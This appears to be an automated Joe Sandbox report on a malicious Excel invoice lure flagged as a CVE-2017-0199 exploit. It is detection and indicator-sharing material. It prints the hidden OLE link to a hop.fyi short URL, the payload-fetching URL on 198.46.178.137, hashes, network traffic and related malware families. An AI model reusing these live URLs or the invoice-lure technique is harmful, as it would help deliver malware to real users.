Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
E-INVOICE.xls

Overview

General Information

Sample name:E-INVOICE.xls
Analysis ID:1467962
MD5:6586786ff2d63581546545fe37f711db
SHA1:227eef347b15fe072cbf41c49a42d4d9f6bb4888
SHA256:3722989fb37d2b30e4e04404660ee6757fe8dc872540ddf57e5c04b8f6307315
Tags:xls
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
AI detected suspicious Excel or Word document
Excel sheet contains many unusual embedded objects
Document embeds suspicious OLE2 link
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1548 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 192.185.89.92, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1548, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1548, Protocol: tcp, SourceIp: 192.185.89.92, SourceIsIpv6: false, SourcePort: 80
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1548, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://hop.fyi/r1FbCAvira URL Cloud: Label: phishing
Source: http://hop.fyi/r1FbC;lI(&Avira URL Cloud: Label: phishing
Source: hop.fyiVirustotal: Detection: 12%Perma Link
Source: http://198.46.178.137/xampp/rg/rg.rg.rg.rgrgrgrgrg.docVirustotal: Detection: 8%Perma Link
Source: http://hop.fyi/r1FbCVirustotal: Detection: 9%Perma Link
Source: E-INVOICE.xlsReversingLabs: Detection: 37%
Source: E-INVOICE.xlsVirustotal: Detection: 23%Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: global trafficDNS query: name: hop.fyi
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global trafficTCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global trafficTCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global trafficTCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.185.89.92:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.137:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global trafficTCP traffic: 198.46.178.137:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global trafficTCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global trafficTCP traffic: 198.46.178.137:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.137:80
Source: Joe Sandbox ViewIP Address: 198.46.178.137 198.46.178.137
Source: Joe Sandbox ViewIP Address: 192.185.89.92 192.185.89.92
Source: global trafficHTTP traffic detected: GET /r1FbC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.137Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /r1FbC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.137Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.137
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.137
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\955171D8.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /r1FbC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.137Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /r1FbC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.137Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: hop.fyi
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 05:13:18 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 37 38 2e 31 33 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.178.137 Port 80</address></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 05:13:35 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 37 38 2e 31 33 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.178.137 Port 80</address></body></html>
Source: E-INVOICE.xls, B9030000.0.drString found in binary or memory: http://hop.fyi/r1FbC;lI(&

System Summary

barindex
Source: E-INVOICE.xlsOLE: Microsoft Excel 2007+
Source: B9030000.0.drOLE: Microsoft Excel 2007+
Source: E-INVOICE.xlsStream path 'MBD00022108/\x1Ole' : http://hop.fyi/r1FbC;lI(&+pR_&Rw8%fG@I[ObaK(_1\+t=\+&*?.16.#<<{iNDDZ+'1ks\-B)UT4aA{0Hq/\bX/IaSiuN"%iAy0B%:cDjSXozvvr7xZ04X4iH43Zaa1IjK6AqdOHyddWrYYiZwMLhEZ1BXYmJ6vq7IDEHjWNIl9p4shJljkQ2RHql00aiYKaxXVXDpnfTvjXivzDHnY7DhLWeHVhA~a/Zdh o+7~30&k*
Source: B9030000.0.drStream path 'MBD00022108/\x1Ole' : http://hop.fyi/r1FbC;lI(&+pR_&Rw8%fG@I[ObaK(_1\+t=\+&*?.16.#<<{iNDDZ+'1ks\-B)UT4aA{0Hq/\bX/IaSiuN"%iAy0B%:cDjSXozvvr7xZ04X4iH43Zaa1IjK6AqdOHyddWrYYiZwMLhEZ1BXYmJ6vq7IDEHjWNIl9p4shJljkQ2RHql00aiYKaxXVXDpnfTvjXivzDHnY7DhLWeHVhA~a/Zdh o+7~30&k*
Source: classification engineClassification label: mal72.winXLS@1/8@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\B9030000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR78F6.tmpJump to behavior
Source: E-INVOICE.xlsOLE indicator, Workbook stream: true
Source: B9030000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: E-INVOICE.xlsReversingLabs: Detection: 37%
Source: E-INVOICE.xlsVirustotal: Detection: 23%
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: E-INVOICE.xlsInitial sample: OLE indicators vbamacros = False
Source: E-INVOICE.xlsInitial sample: OLE indicators encrypted = True

Persistence and Installation Behavior

barindex
Source: Office documentLLM: Score: 9 Reasons: The screenshot contains a visually prominent message stating 'This document is protected' alongside a recognizable Microsoft Office logo, which can create a false sense of legitimacy. The text 'This document is protected' implies that the user needs to take action to view the document, creating a sense of urgency. The use of the Microsoft Office logo is an attempt to impersonate a well-known brand, which can mislead users into trusting the document. The combination of these elements strongly suggests that the document could be used to trick users into clicking on a potentially harmful link, leading to a phishing page or malware download.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: E-INVOICE.xlsStream path 'Workbook' entropy: 7.99648221014 (max. 8.0)
Source: B9030000.0.drStream path 'Workbook' entropy: 7.99639050495 (max. 8.0)
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Exploitation for Client Execution
1
Browser Extensions
Path Interception1
Masquerading
OS Credential Dumping1
File and Directory Discovery
Remote ServicesData from Local System3
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Obfuscated Files or Information
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media13
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
E-INVOICE.xls38%ReversingLabsWin32.Exploit.CVE-2017-0199
E-INVOICE.xls23%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
hop.fyi13%VirustotalBrowse
SourceDetectionScannerLabelLink
http://198.46.178.137/xampp/rg/rg.rg.rg.rgrgrgrgrg.doc0%Avira URL Cloudsafe
http://hop.fyi/r1FbC100%Avira URL Cloudphishing
http://hop.fyi/r1FbC;lI(&100%Avira URL Cloudphishing
http://198.46.178.137/xampp/rg/rg.rg.rg.rgrgrgrgrg.doc9%VirustotalBrowse
http://hop.fyi/r1FbC10%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
hop.fyi
192.185.89.92
truefalseunknown
NameMaliciousAntivirus DetectionReputation
http://hop.fyi/r1FbCtrue
  • 10%, Virustotal, Browse
  • Avira URL Cloud: phishing
unknown
http://198.46.178.137/xampp/rg/rg.rg.rg.rgrgrgrgrg.docfalse
  • 9%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://hop.fyi/r1FbC;lI(&E-INVOICE.xls, B9030000.0.drtrue
  • Avira URL Cloud: phishing
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
198.46.178.137
unknownUnited States
36352AS-COLOCROSSINGUSfalse
192.185.89.92
hop.fyiUnited States
46606UNIFIEDLAYER-AS-1USfalse
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1467962
Start date and time:2024-07-05 07:12:07 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 57s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:E-INVOICE.xls
Detection:MAL
Classification:mal72.winXLS@1/8@1/2
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • Report size getting too big, too many NtQueryValueKey calls found.
No simulations
InputOutput
URL: Office document Model: gpt-4o
```json{  "riskscore": 9,  "reasons": "The screenshot contains a visually prominent message stating 'This document is protected' alongside a recognizable Microsoft Office logo, which can create a false sense of legitimacy. The text 'This document is protected' implies that the user needs to take action to view the document, creating a sense of urgency. The use of the Microsoft Office logo is an attempt to impersonate a well-known brand, which can mislead users into trusting the document. The combination of these elements strongly suggests that the document could be used to trick users into clicking on a potentially harmful link, leading to a phishing page or malware download."}
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
198.46.178.137Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
  • 198.46.178.137/22033/igccu.exe
EY8qnRKXcx.rtfGet hashmaliciousLokibotBrowse
  • 198.46.178.137/88133/igccu.exe
Scan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
  • 198.46.178.137/88133/igccu.exe
Renameme@1.xlsGet hashmaliciousUnknownBrowse
  • 198.46.178.137/xampp/ev/ev.v.v.v.vvvv.doc
Renameme@1.xlsGet hashmaliciousUnknownBrowse
  • 198.46.178.137/xampp/ev/ev.v.v.v.vvvv.doc
192.185.89.92Quotation.xlsGet hashmaliciousRemcosBrowse
  • hop.fyi/NlD6e
Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
  • hop.fyi/ppltL
Ship particulars.xlsGet hashmaliciousUnknownBrowse
  • hop.fyi/sWel7
DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
  • hop.fyi/aNUxj
457525.xlsGet hashmaliciousUnknownBrowse
  • hop.fyi/mxcbs
457525.xlsGet hashmaliciousUnknownBrowse
  • hop.fyi/mxcbs
457525.xlsGet hashmaliciousUnknownBrowse
  • hop.fyi/uW4Kj
457525.xlsGet hashmaliciousUnknownBrowse
  • hop.fyi/mxcbs
Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
  • hop.fyi/30dp7
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
hop.fyiQuotation.xlsGet hashmaliciousRemcosBrowse
  • 192.185.89.92
Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
  • 192.185.89.92
Ship particulars.xlsGet hashmaliciousUnknownBrowse
  • 192.185.89.92
DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
  • 192.185.89.92
457525.xlsGet hashmaliciousUnknownBrowse
  • 192.185.89.92
457525.xlsGet hashmaliciousUnknownBrowse
  • 192.185.89.92
457525.xlsGet hashmaliciousUnknownBrowse
  • 192.185.89.92
457525.xlsGet hashmaliciousUnknownBrowse
  • 192.185.89.92
Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
  • 192.185.89.92
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
AS-COLOCROSSINGUSNuevo orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
  • 192.3.216.148
Pod0SuHrkb.rtfGet hashmaliciousUnknownBrowse
  • 198.46.178.139
Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
  • 192.3.64.135
orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
  • 192.3.243.156
DHL Invoice 20240407.xlsGet hashmaliciousFormBookBrowse
  • 23.95.235.16
McrflHf6vg.exeGet hashmaliciousWhiteSnake StealerBrowse
  • 107.173.80.187
3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exeGet hashmaliciousRemcosBrowse
  • 107.173.4.18
BDQfYL99b2.exeGet hashmaliciousRemcosBrowse
  • 107.173.4.18
Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
  • 107.174.145.78
Quotation.xlsGet hashmaliciousRemcosBrowse
  • 107.173.4.18
